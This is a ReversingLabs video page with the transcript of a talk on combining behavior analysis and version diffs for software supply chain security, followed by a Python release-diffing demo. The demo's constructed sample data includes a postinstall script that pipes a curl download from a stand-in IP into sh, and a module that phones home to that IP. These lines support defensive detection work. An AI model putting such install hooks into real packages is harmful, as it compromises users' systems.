
Behaviors and Diffs: Better Together for Software Supply Chain Security

June 1, 2023

In this episode, Matt Rose explains how software supply chain security is better with the wonder duo of behavior and differential analysis.

Keep learning
• More RG: Supply Chain in Art and Life
• Blog: RSAC 23: Supply Chain and AI
• Special: The State of Supply Chain Security

Episode Transcript

MATT ROSE: Hi everyone. Welcome back to another episode of ReversingGlass. I'm Matt Rose, Field CISO at ReversingLabs. Today's episode, across the top as usual, is Better Together: SSCS, or Software Supply Chain Security. There are really two aspects of software supply chain security that I think work very well together to help identify risks in the software that you're creating.

But before we start, let's talk about some historic better-together individuals. The one that I wanna start with, and this is one of my favorites from the past, is Batman, but I'm not talking about the modern Batman, which is all special effects. I'm talking about Burt Ward and Adam West in the show, which was... pretty bad, but one of my favorite things to watch when I was a kid before school. Great better together, Batman and Robin, always. But I always like to do a little weird stuff on this episode too. Do you know, and this is just a little history lesson here, that Adam West is Batman? We just established that, but Adam West is also Mayor West from Family Guy.

Bringing things together here: Batman, Adam West, one of the greatest, I think, TV shows of the '60s and '70s. And then in one of the modern episodes of Family Guy is Mayor West. We'll just leave that, but if you're not a superhero person, another example that I'd like to say is better together is Forrest Gump, like peas and carrots, better together. We're like peas and carrots.

What we're gonna talk about today is better together with software supply chain security, and let me grab my pen. The two things that I think are very important for effective software supply chain security are behaviors of the package that you're creating, deploying, so on and so forth. So you have your behaviors, and DIFFS of different releases, version 1.1 to 1.2, so on and so forth. Why are these two things important? Because software supply chain security is about producing software that is doing what it's supposed to do.

A lot of times people architect a product to do certain things, to perform certain functions. These are the behaviors. It connects to APIs, it opens up ports, 443 or 80 or whatever it is. Is it doing what it's supposed to be doing? Because really what hacks do, whether they're in code or in an application that's deployed, is go outside the bounds of the intended purpose.

So if you think about, you know, your package, and I always like to use a nice Christmas package here, or birthday package, whatever you want to call it. Is this package doing what it's supposed to be doing? You have all these things that it's doing in terms of its behaviors, but all of a sudden you realize, hey, I am not anticipating numbers seven and eight in terms of the behavior.

I don't know if this is something that's intended, something that's accidental, or it's malware trying to change some things in the package to allow [00:03:00] itself to execute. So for software supply chain security to be effective, you have to really dig into the behaviors of the package itself. Are these behaviors suspect?

Is it doing the things it's supposed to be doing, or is it doing things that it's not anticipated to do? The first sign of a potential software supply chain breach is questionable behaviors. What is that piece of software or application doing after analyzing it from a software supply chain security standpoint?

The next thing that is vitally important is DIFFS. DIFFS is short for differential, or looking at the versions, as I said, 1.1 to 1.2. What has changed in this application? Is this a small release or a large release? How many files are changed? You know, how many are deleted? And how many are added to this package?

This is another litmus test for the validity of this package. So you're thinking about: is it doing things that [00:04:00] you're not anticipating it doing, or is it doing things that are outside the bounds of the purpose, or is it radically changing the composition of the application? In a lot of different software supply chain attacks, you have added files, or files are taken out, or files are manipulated or changed to allow the malware or that software supply chain attack to propagate itself and work correctly.

So when you're thinking about software supply chain security, don't just think about malware. Malware is vitally important. Yes. No questions about that. Malware is the DNA of software supply chain attacks. It's getting that malware into the process itself, but malware is very difficult to find. It's not as easy as grepping the package or the results of the set and saying, find malware.DLL on the package.

I say that a lot, but it's not as simple as that. The way that you can actually uncover malware hiding itself, sometimes in plain sight, is through questionable behaviors or unanticipated behaviors, and major or minor, for that matter, changes that are potentially unapproved, or things where somebody has compromised the build system or the code or third parties or open source to allow for that attack to happen.

So think about it. When you think about software supply chain security, think about things working better together, whether it's Batman and Robin or Jenny and Forrest: Behaviors and DIFFS are better together for software supply chain security. Thanks for watching. Hope you enjoyed the episode. Have a great day everybody.
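The differential check Matt describes (added, removed and modified files between release 1.1 and 1.2, and whether the changed files introduce behavior the package was not designed for) is simple to automate once you have each release's file contents. The following is an added example written for this page; it is not code from the episode or from a ReversingLabs product. The two release trees, the `EXPECTED_HOSTS` allowlist, the install-hook directory names and the URL-based "network destination" heuristic are all constructed assumptions, and the string scan is only a crude static stand-in for real behavior analysis.

```python
import hashlib
import re

# Constructed sample release contents (path -> bytes). These are illustrative
# files written for this example, not a real package.
RELEASE_1_1 = {
    "lib/app.py": b"def run():\n    return 'ok'\n",
    "lib/util.py": b"def helper(x):\n    return x * 2\n",
    "README.md": b"# demo package\n",
}
RELEASE_1_2 = {
    "lib/app.py": b"def run():\n    return 'ok v2'\n",
    "lib/util.py": b"def helper(x):\n    return x * 2\n",
    "README.md": b"# demo package\n",
    # Two additions a point release should not need: a module that phones
    # home, and a shell install hook that pipes a download into sh.
    "lib/telemetry.py": b"import urllib.request\nurllib.request.urlopen('http://203.0.113.5:8080/c')\n",
    "scripts/postinstall.sh": b"#!/bin/sh\ncurl -s http://203.0.113.5/x | sh\n",
}

# Hypothetical allowlist: the hosts the package is designed to talk to.
EXPECTED_HOSTS = {"api.example.com"}
HOOK_DIRS = ("scripts/", "hooks/")            # assumed install-time code locations
NATIVE_EXT = (".dll", ".so", ".dylib", ".exe")  # native code deserves a look on its own
HOST_RE = re.compile(rb"https?://([A-Za-z0-9.\-]+)(?::(\d+))?")


def manifest(files):
    """Map each path to the SHA-256 of its content."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def diff_releases(old, new):
    """Classify every path in either release as added, removed, modified or unchanged."""
    m_old, m_new = manifest(old), manifest(new)
    common = set(m_old) & set(m_new)
    return {
        "added": sorted(set(m_new) - set(m_old)),
        "removed": sorted(set(m_old) - set(m_new)),
        "modified": sorted(p for p in common if m_old[p] != m_new[p]),
        "unchanged": sorted(p for p in common if m_old[p] == m_new[p]),
    }


def summarize(diff):
    """Counts per category plus the fraction of all paths that changed (release size)."""
    total = sum(len(v) for v in diff.values())
    changed = len(diff["added"]) + len(diff["removed"]) + len(diff["modified"])
    return {**{k: len(v) for k, v in diff.items()}, "churn": changed / total}


def network_indicators(data):
    """Crude static proxy for 'connects to' behavior: (host, port) pairs found in URLs."""
    found = set()
    for host, port in HOST_RE.findall(data):
        found.add((host.decode(), int(port) if port else None))
    return found


def find_suspicious(diff, old, new):
    """Flag added/modified files that bring install hooks, native code or new destinations."""
    findings = []
    for path in diff["added"] + diff["modified"]:
        if path.startswith(HOOK_DIRS) or path.endswith(NATIVE_EXT):
            findings.append((path, "added or changed install hook / native binary"))
        before = network_indicators(old.get(path, b""))
        for host, port in sorted(network_indicators(new[path]), key=str):
            if host not in EXPECTED_HOSTS and (host, port) not in before:
                findings.append((path, f"new network destination {host}:{port or 'default'}"))
    return findings


if __name__ == "__main__":
    diff = diff_releases(RELEASE_1_1, RELEASE_1_2)
    print("summary:", summarize(diff))
    for path, why in find_suspicious(diff, RELEASE_1_1, RELEASE_1_2):
        print(f"SUSPECT {path}: {why}")
```

On the constructed input the diff alone already says something: a "minor" bump that adds two files and touches a third out of five is sixty percent churn. Pairing that with the behavior side (a new install hook and a new destination that is not on the package's allowlist) is what turns a large diff into a concrete question for the release owner, which is the better-together point of the episode. In practice the file contents would come from unpacking the two published artifacts, and the behavior side would come from real static and dynamic analysis rather than a URL regex.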

About Author: Matt Rose

Field CISO at ReversingLabs. Matt Rose has an extensive background in application security, object-oriented programming, multi-tier architecture design and implementation, and internet/intranet development. His areas of expertise include Application Security, SAST, DAST, IAST, SCA, DevSecOps, and Threat Modeling. Matt is an accomplished public speaker and has been quoted in 50+ AST industry media publications.

Related episodes
• ReversingGlass: EO on AI: What security teams need to know
• Shift Up Your SBOM
• AI and Software Supply Chain Security: Proceed with Caution
• What the heck is an SBOM?
• What is ReversingGlass?